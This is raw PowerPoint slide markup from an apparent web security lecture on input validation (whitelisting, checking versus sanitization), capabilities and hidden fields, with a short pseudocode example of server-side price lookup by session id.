            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" b="1" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Whitelisting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>More </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>secure </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>than</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="50" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>blacklisting</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Checking</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>More </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>secure </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>than</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sanitization</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37923A3C-3059-3645-B84B-588F47D2B4F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1450975" y="486568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1" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93EF0E2A-C734-8E47-B876-F8346ABCD12E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1790700" y="4806950"/>
            <a:ext cx="4119563" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Proper </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sanitization is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" i="1" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hard</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D53184B-0935-7942-98F9-6DA5DBE57974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="543560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3" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CA33249-05AA-1044-BF8F-58305EE285CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="6005513"/>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83310" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97F694BD-F1B2-C44A-93C4-EE4283D88AA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="5226050"/>
            <a:ext cx="7204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6000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>All data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Are you sure you found all inputs?  Don’t roll your own: libraries, frameworks, etc.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BE44853-5304-0640-8E07-227C0488DD11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1106124" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="85" dirty="0"/>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="100" dirty="0"/>
              <a:t>capabilities</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B6283D8-0A12-E843-885E-86E13F02BB41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="2827338"/>
            <a:ext cx="5329238"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sz="1900">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRP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if(pay == yes &amp;&amp; price != NULL)</a:t>
            </a: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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="75"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bill_creditcard(price);  deliver_socks();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1925"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a: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else</a:t>
            </a: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display_transaction_cancelled_page();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{161CF468-2BFE-9C47-AB4E-BF7F1DC15A41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841500" y="1968500"/>
            <a:ext cx="6370638" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>corresponding </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>backend</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="-60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>processing</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32773" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ED66A1B-32C2-3647-80E2-86131EAB1832}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2428875" y="2808288"/>
            <a:ext cx="5329238" cy="2112962"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 5328920"/>
              <a:gd name="T1" fmla="*/ 0 h 2112010"/>
              <a:gd name="T2" fmla="*/ 5335903 w 5328920"/>
              <a:gd name="T3" fmla="*/ 0 h 2112010"/>
              <a:gd name="T4" fmla="*/ 5335903 w 5328920"/>
              <a:gd name="T5" fmla="*/ 2133874 h 2112010"/>
              <a:gd name="T6" fmla="*/ 0 w 5328920"/>
              <a:gd name="T7" fmla="*/ 2133874 h 2112010"/>
              <a:gd name="T8" fmla="*/ 0 w 5328920"/>
              <a:gd name="T9" fmla="*/ 0 h 21120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8920" h="2112010">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5328589" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5328589" y="2111870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="211187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2774" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0DF2DF2-6250-5040-8ECB-DEA844E37631}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1412875" y="2711450"/>
            <a:ext cx="7227888" cy="2557463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="982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8381" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="28575">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ts val="150"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>price = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lookup(sid)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if(pay == yes &amp;&amp; price != NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="75"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bill_creditcard(price);  deliver_socks();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1925"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="63"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>display_transaction_cancelled_page();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="63"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="020703090202050204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6563F6CB-0E1B-B04A-8414-7E55F72481B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234950" y="203200"/>
            <a:ext cx="32353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265" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>dd</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>fi</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>d</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2)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{934496E1-FDC2-C74E-8549-01271BA60945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="674688" y="1957388"/>
            <a:ext cx="8704262" cy="446087"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T1" fmla="*/ 0 h 198755"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T3" fmla="*/ 833815150 h 198755"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T6" fmla="*/ 0 w 3989704"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T8" fmla="*/ 0 w 3989704"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T16" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T17" fmla="*/ 0 h 1987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89704" h="198755">
                <a:moveTo>
                  <a:pt x="3938835" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="41297" y="897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7785" y="23858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="50804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="198369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3989645" y="198369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3988747" y="41293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3965784" y="7784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="393883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796" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E68CD191-E2F4-B241-A844-3DDB0366F001}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="671513" y="2366963"/>
            <a:ext cx="8712200" cy="125412"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3992879"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 55244"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 3992879"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 55244"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 3992879"/>
              <a:gd name="T5" fmla="*/ 0 h 55244"/>
              <a:gd name="T6" fmla="*/ 0 w 3992879"/>
              <a:gd name="T7" fmla="*/ 0 h 55244"/>
              <a:gd name="T8" fmla="*/ 0 w 3992879"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 552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92879" h="55244">
                <a:moveTo>
                  <a:pt x="0" y="54863"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3992879" y="54863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3992879" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="54863"/>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797" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
